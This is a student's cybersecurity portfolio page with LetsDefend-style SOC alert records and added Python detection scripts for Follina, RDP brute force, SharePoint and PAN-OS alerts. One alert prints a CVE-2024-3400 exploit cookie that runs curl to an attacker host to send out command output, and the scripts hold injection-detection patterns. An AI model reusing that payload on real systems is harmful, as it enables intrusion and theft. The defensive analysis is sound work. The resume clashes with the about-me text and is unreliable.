About me

Final-year B.Tech student specializing in Cybersecurity at Veltech University, Chennai. I have a strong passion for cybersecurity, focusing on areas like Security Operations Center (SOC) work, malware analysis, threat detection, and network security. My academic journey has provided me with a solid foundation in computer science and hands-on experience with cybersecurity tools and practices. I'm currently working on several projects, including an ELK stack lab setup, a password validity and strength checker, and a Splunk lab setup.

While my primary interest lies in cybersecurity, I also have experience working with Python, SQL, and assembly language for reverse engineering. I enjoy applying these skills to solve real-world challenges. In the future, I aim to continue exploring advanced topics in cybersecurity, contributing to secure system designs, and expanding my knowledge in threat modeling and incident response. I also enjoy developing responsive websites using AI tools.

My journey reflects a continuous pursuit of knowledge, with a strong focus on practical application through projects and research.

Active Engagements

  • Threat Detection and Response

    Specialized in detecting and responding to cyber threats using industry-leading tools and methodologies to ensure robust security defenses.

  • Malware Analysis

    Analyzing and reversing malware to understand attack vectors and behaviors, enabling proactive defense mechanisms.

  • Network Traffic Analysis

    Expert in analyzing network traffic to detect anomalies, malicious activities, and potential threats using advanced tools like Wireshark and tcpdump.

  • Responsive Web Development with AI Tools

    Developing responsive, secure websites using AI-powered tools, focusing on security best practices and modern design principles.

Resume

Education

  1. Georgia State University, B.B.A

    Aug. 2017 — Dec. 2021

    Relevant Coursework: Intro to Programming: Python, Database Management Systems, Systems Analysis, Managing IT Projects, Strategic Management, Business Analysis, Intro to Security, Systems and Network Security, Cybersecurity Tools

Experience

  1. Blockchain Intern

    Sept. 2021 — Dec. 2021

    ♡ Researched and shared upcoming NFT projects

    ♡ Investigated implementations of smart contracts using Solidity

    ♡ Developed an NFT collection for a React application by writing a smart contract in Solidity

  2. Technology Innovation Intern

    June 2021 — Aug. 2021

    ♡ Conducted PCA analysis through K-means clustering to find correlations within the collected data set

    ♡ Developed a front-end web application utilizing HTML and CSS, implemented heat mapping analytics using Heatmap.js

    ♡ Developed bots utilizing PyAutoGUI to analyze and differentiate between bot and human users interacting on a website

  3. Research Assistant

    Jan. 2018 — May 2018

    ♡ Analyzed fMRI scans using SPM8 through MATLAB

    ♡ Worked alongside graduate students studying schizophrenia to find correlations between brain scans of schizophrenic patients and non-schizophrenic patients

My skills

  • Web design
    80%
  • Graphic design
    70%
  • Branding
    90%
  • WordPress
    50%

Portfolio

My Projects

Alerts

Priority | Time | Rule Name | Event ID | Event Type
Medium | Oct 31, 2024, 06:56 AM | SOC173 - Follina 0-Day Detected | 123 | Malware

EventID: 123

Event Time: Jun, 02, 2022, 03:22 PM

Rule: SOC173-Follina 0-Day Detected

Level: Security Analyst

Source Address: 172.16.17.39

Hostname: JonasPRD

File Name: 05-2022-0438.doc

File Hash: 52945af1def85b171870b31fa4782e52

File Size: 10.01 KB

AV Action: Allowed

Alert Trigger Reason: msdt.exe executed after Office document
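The trigger above, "msdt.exe executed after Office document", is a process-tree condition. The following is an added example of that detection logic run over constructed Sysmon-style ProcessCreate events; it is not LetsDefend code or data, and the host name, paths and command lines are assumed for illustration.

```python
"""Process-tree detection for the Follina trigger: msdt.exe started by an
Office application. Added example over constructed Sysmon-style
ProcessCreate events, not LetsDefend data."""
from dataclasses import dataclass
from typing import List, Optional

# Office hosts that render the malicious document and invoke the ms-msdt: handler.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Strings from the public Follina payloads; they raise confidence but are not
# required, because attackers can vary the command line.
MSDT_MARKERS = ("ms-msdt:", "it_browseforfile", "it_rebrowseforfile")


@dataclass
class ProcessEvent:
    host: str
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    """Return the file name from a Windows or POSIX path, lower-cased."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcessEvent) -> Optional[str]:
    """Return 'high', 'medium' or None for one process-creation event."""
    if basename(ev.image) != "msdt.exe":
        return None
    office_parent = basename(ev.parent_image) in OFFICE_PARENTS
    marker = any(m in ev.command_line.lower() for m in MSDT_MARKERS)
    if office_parent and marker:
        return "high"      # Office spawned msdt with a protocol-handler payload
    if office_parent or marker:
        return "medium"    # one indicator: triage, but do not auto-dismiss
    return None


def detect(events: List[ProcessEvent]) -> List[dict]:
    """Run classify() over a batch and return the alert records."""
    alerts = []
    for ev in events:
        sev = classify(ev)
        if sev:
            alerts.append({"host": ev.host, "severity": sev,
                           "parent": basename(ev.parent_image),
                           "command_line": ev.command_line})
    return alerts


# Constructed sample events (not real telemetry). The first mimics the
# "msdt.exe executed after Office document" trigger; the second is an
# administrator opening a troubleshooter from Explorer, which must not alert.
SAMPLE_EVENTS = [
    ProcessEvent("JonasPRD",
                 r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\System32\msdt.exe",
                 'msdt.exe ms-msdt:/id PCWDiagnostic /skip force /param "IT_BrowseForFile=..."'),
    ProcessEvent("JonasPRD",
                 r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\msdt.exe",
                 "msdt.exe -id NetworkDiagnosticsWeb"),
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Parent-process context is what separates this from a generic "msdt.exe ran" rule: msdt is a legitimate Windows tool, so only the Office parent (and, as a second signal, the ms-msdt: handler on the command line) justifies a high severity.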

Medium | Oct 28, 2024, 06:58 PM | SOC176 - RDP Brute Force Detected | 234 | Brute Force

EventID: 234

Event Time: Mar, 07, 2024, 11:44 AM

Rule: SOC176 - RDP Brute Force Detected

Level: Security Analyst

Source IP Address: 218.92.0.56

Destination IP Address: 172.16.17.148

Destination Hostname: Matthew

Protocol: RDP

Firewall Action: Allowed

Alert Trigger Reason: Login failure from a single source with different non-existing accounts
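The trigger above, "login failure from a single source with different non-existing accounts", maps onto Windows Security event 4625 with SubStatus 0xC0000064 (user name does not exist). The following is an added example of that logic as a sliding-window count per source IP, run over constructed 4625 records; it is not LetsDefend code or data, and the thresholds, internal addresses and user names are assumptions.

```python
"""Detection for "login failure from a single source with different
non-existing accounts". Added example over constructed Windows Security
event 4625 records, not LetsDefend data."""
from collections import defaultdict, deque
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Deque, Dict, List, Tuple

# 4625 SubStatus codes documented by Microsoft.
USER_DOES_NOT_EXIST = "0xC0000064"   # account does not exist (user enumeration)
BAD_PASSWORD = "0xC000006A"          # account exists, password wrong

# Logon types RDP produces: 10 (RemoteInteractive) and, with Network Level
# Authentication enabled, 3 (Network) for the pre-auth failure.
RDP_LOGON_TYPES = {"3", "10"}


@dataclass
class LogonFailure:
    time: datetime
    source_ip: str
    target_host: str
    target_user: str
    logon_type: str
    sub_status: str


def detect_user_enumeration(events: List[LogonFailure],
                            window: timedelta = timedelta(minutes=5),
                            min_distinct_users: int = 5) -> List[dict]:
    """Sliding window per source IP: alert when one source fails against
    `min_distinct_users` different non-existent accounts inside `window`.
    One alert per source per window; it re-arms once the window has passed."""
    recent: Dict[str, Deque[Tuple[datetime, str]]] = defaultdict(deque)
    alerted: Dict[str, datetime] = {}
    alerts: List[dict] = []
    for ev in sorted(events, key=lambda e: e.time):
        if ev.sub_status != USER_DOES_NOT_EXIST or ev.logon_type not in RDP_LOGON_TYPES:
            continue
        q = recent[ev.source_ip]
        q.append((ev.time, ev.target_user))
        while q and ev.time - q[0][0] > window:
            q.popleft()                      # drop failures outside the window
        users = {u for _, u in q}
        last = alerted.get(ev.source_ip)
        if len(users) >= min_distinct_users and (last is None or ev.time - last > window):
            alerted[ev.source_ip] = ev.time
            alerts.append({"rule": "RDP brute force: non-existent accounts",
                           "source_ip": ev.source_ip, "target_host": ev.target_host,
                           "distinct_users": len(users),
                           "first_seen": q[0][0], "last_seen": ev.time})
    return alerts


def _sample() -> List[LogonFailure]:
    """Constructed events: a spray of guessed user names from one external IP
    (the source address in the alert above), plus a user mistyping their own
    password from the LAN, which must not alert."""
    t0 = datetime(2024, 3, 7, 11, 40)
    spray = [LogonFailure(t0 + timedelta(seconds=20 * i), "218.92.0.56", "Matthew",
                          name, "3", USER_DOES_NOT_EXIST)
             for i, name in enumerate(["admin", "administrator", "test",
                                       "user", "backup", "scanner"])]
    typo = [LogonFailure(t0 + timedelta(seconds=30 * i), "172.16.17.50", "Matthew",
                         "matthew", "10", BAD_PASSWORD) for i in range(6)]
    return spray + typo


SAMPLE_ALERTS = detect_user_enumeration(_sample())

if __name__ == "__main__":
    for alert in SAMPLE_ALERTS:
        print(alert)
```

Keying on the SubStatus rather than on raw failure counts is what keeps the repeated-typo case quiet: the same existing account failing six times is a lockout concern, not enumeration, and would belong in a separate rule.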

Critical | Oct 28, 2024, 03:13 PM | SOC227 - Microsoft SharePoint Server Elevation of Privilege - Possible CVE-2023-29357 Exploitation | 189 | Web Attack

EventID: 189

Event Time: Oct, 06, 2023, 08:05 PM

Rule: SOC227 - Microsoft SharePoint Server Elevation of Privilege - Possible CVE-2023-29357 Exploitation

Level: Security Analyst

Hostname: MS-SharePointServer

Destination IP Address: 172.16.17.233

Source IP Address: 39.91.166.222

HTTP Request Method: GET

Requested URL: /_api/web/siteusers

User-Agent: python-requests/2.28.1

Alert Trigger Reason: This activity may be indicative of an attempt to exploit the CVE-2023-29357 vulnerability, which could potentially lead to unauthorized access and privilege escalation within the SharePoint server.

Device Action: Allowed

High | Oct 27, 2024, 04:05 AM | SOC104 - Malware Detected | 36 | Malware Attack

EventID: 36

Event Time: Dec, 01, 2020, 10:23 AM

Rule: SOC104 - Malware Detected

Level: Security Analyst

Source Address: 10.15.15.18

Source Hostname: AdamPRD

File Name: Invoice.exe

File Hash: f83fb9ce6a83da58b20685c1d7e1e546

File Size: 473.00 KB

Device Action: Allowed

Medium | Oct 29, 2024, 08:23 AM | SOC251 - Quishing Detected (QR Code Phishing) | 214 | Exchange

EventID: 214

Event Time: Jan, 01, 2024, 12:37 PM

Rule: SOC251 - Quishing Detected (QR Code Phishing)

Level: Security Analyst

SMTP Address: 158.69.201.47

Source Address: security@microsecmfa.com

Destination Address: Claire@letsdefend.io

E-mail Subject: New Year's Mandatory Security Update Implementing Multi-Factor Authentication (MFA)

Device Action: Allowed

Critical | Oct 27, 2024, 08:55 AM | SOC274 - Palo Alto Networks PAN-OS Command Injection Vulnerability Exploitation (CVE-2024-3400) | 249 | Web Attack

EventID: 249

Event Time: Apr, 18, 2024, 03:09 AM

Rule: SOC274 - Palo Alto Networks PAN-OS Command Injection Vulnerability Exploitation (CVE-2024-3400)

Level: Security Analyst

Hostname: PA-Firewall-01

Destination IP Address: 172.16.17.139

Source IP Address: 144.172.79.92

HTTP Request Method: POST

Requested URL: 172.16.17.139/global-protect/login.esp

Cookie: SESSID=////opt/panlogs/tmp/device_telemetry/hour/aaa`curl${IFS}144.172.79.92:4444?user=$(whoami)`

Alert Trigger Reason: Characteristic exploit pattern detected in the cookie and request, indicative of exploitation of CVE-2024-3400

Device Action: Allowed
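Both web-attack alerts above (the SOC227 SharePoint /_api/web/siteusers request and the SOC274 PAN-OS SESSID cookie) are conditions on a single HTTP request record. The following is an added example of both checks run over constructed proxy/WAF records; it is not LetsDefend code or data. The source and destination values are taken from the alerts; the benign requests, user-agent list and regular expressions are assumptions. The CVE-2023-29357 check is deliberately an indicator, not proof: the authentication bypass happens in a forged token that a request log does not show, so the rule keys on the enumeration call, a scripted client and an external source.

```python
"""Request-log checks for the SharePoint siteusers probe (CVE-2023-29357)
and the PAN-OS GlobalProtect SESSID cookie injection (CVE-2024-3400).
Added example over constructed proxy/WAF records, not LetsDefend data."""
import ipaddress
import re
from dataclasses import dataclass
from typing import List, Optional

SCRIPTED_UA = re.compile(r"^(python-requests|curl|go-http-client|wget)/", re.I)
# REST call used to enumerate site users after the token-based auth bypass.
SHAREPOINT_SITEUSERS = re.compile(r"/_api/web/siteusers\b", re.I)
GLOBALPROTECT_PATH = re.compile(r"/(global-protect|ssl-vpn)/", re.I)
# A legitimate SESSID is an opaque token; slashes, traversal or shell
# metacharacters mean the value is being used to write a file name.
SESSID_RE = re.compile(r"(?:^|;\s*)SESSID=([^;]*)")
INJECTION_RE = re.compile(r"(\.\./|//|`|\$\(|\$\{|\|)")


@dataclass
class HttpRequest:
    src_ip: str
    dst_host: str
    method: str
    path: str
    user_agent: str = ""
    cookie: str = ""


def is_external(ip: str) -> bool:
    """True for globally routable sources (not RFC 1918, loopback, etc.)."""
    return ipaddress.ip_address(ip).is_global


def check_sharepoint(req: HttpRequest) -> Optional[str]:
    """Scripted or external GET against the siteusers REST endpoint."""
    if req.method.upper() == "GET" and SHAREPOINT_SITEUSERS.search(req.path):
        if SCRIPTED_UA.search(req.user_agent) or is_external(req.src_ip):
            return "Possible CVE-2023-29357: scripted/external siteusers enumeration"
    return None


def check_panos_cookie(req: HttpRequest) -> Optional[str]:
    """GlobalProtect request whose SESSID carries traversal or shell syntax."""
    if not GLOBALPROTECT_PATH.search(req.path):
        return None
    m = SESSID_RE.search(req.cookie)
    if m and INJECTION_RE.search(m.group(1)):
        return "Possible CVE-2024-3400: traversal/command injection in SESSID"
    return None


def detect(requests: List[HttpRequest]) -> List[dict]:
    """Apply both checks to every record and return alert dicts."""
    alerts = []
    for r in requests:
        for check in (check_sharepoint, check_panos_cookie):
            reason = check(r)
            if reason:
                alerts.append({"src_ip": r.src_ip, "dst_host": r.dst_host,
                               "path": r.path, "reason": reason})
    return alerts


SAMPLE_REQUESTS = [
    # Addresses, paths, user-agent and cookie follow the two alerts above.
    HttpRequest("39.91.166.222", "MS-SharePointServer", "GET", "/_api/web/siteusers",
                user_agent="python-requests/2.28.1"),
    HttpRequest("144.172.79.92", "PA-Firewall-01", "POST", "/global-protect/login.esp",
                cookie="SESSID=////opt/panlogs/tmp/device_telemetry/hour/aaa"
                       "`curl${IFS}144.172.79.92:4444?user=$(whoami)`"),
    # Constructed benign traffic: a LAN user browsing SharePoint and a normal
    # GlobalProtect login with an opaque session token.
    HttpRequest("172.16.17.40", "MS-SharePointServer", "GET", "/_api/web/siteusers",
                user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64)"),
    HttpRequest("203.0.113.9", "PA-Firewall-01", "POST", "/global-protect/login.esp",
                cookie="SESSID=2b7e151628aed2a6abf7158809cf4f3c"),
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_REQUESTS):
        print(alert)
```

For the PAN-OS rule the cookie value alone is decisive: a session identifier never contains a path, so any slash is enough to raise the alert even before the backtick or ${IFS} pattern is matched, which is why the check is robust to attackers rewriting the command portion.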

High | Oct 29, 2024, 05:00 AM | SOC202 - FakeGPT Malicious Chrome Extension | 153 | Data Leakage

EventID: 153

Event Time: May, 29, 2023, 01:01 PM

Rule: SOC202 - FakeGPT Malicious Chrome Extension

Level: Security Analyst

Hostname: Samuel

IP Address: 172.16.17.173

File Name: hacfaophiklaeolhnmckojjjjbnappen.crx

File Path: C:\Users\LetsDefend\Download\hacfaophiklaeolhnmckojjjjbnappen.crx

File Hash: 7421f9abe5e618a0d517861f4709df53292a5f137053a227bfb4eb8e152a4669

Command Line: chrome.exe --single-argument C:\Users\LetsDefend\Download\hacfaophiklaeolhnmckojjjjbnappen.crx

Trigger Reason: Suspicious extension added to the browser.

Device Action: Allowed

Medium | Oct 24, 2024, 05:57 AM | SOC282 - Phishing Alert - Deceptive Mail Detected | 257 | Exchange

EventID: 257

Event Time: May, 13, 2024, 09:22 AM

Rule: SOC282 - Phishing Alert - Deceptive Mail Detected

Level: Security Analyst

SMTP Address: 103.80.134.63

Source Address: free@coffeeshooop.com

Destination Address: Felix@letsdefend.io

E-mail Subject: Free Coffee Voucher

Device Action: Allowed

CTF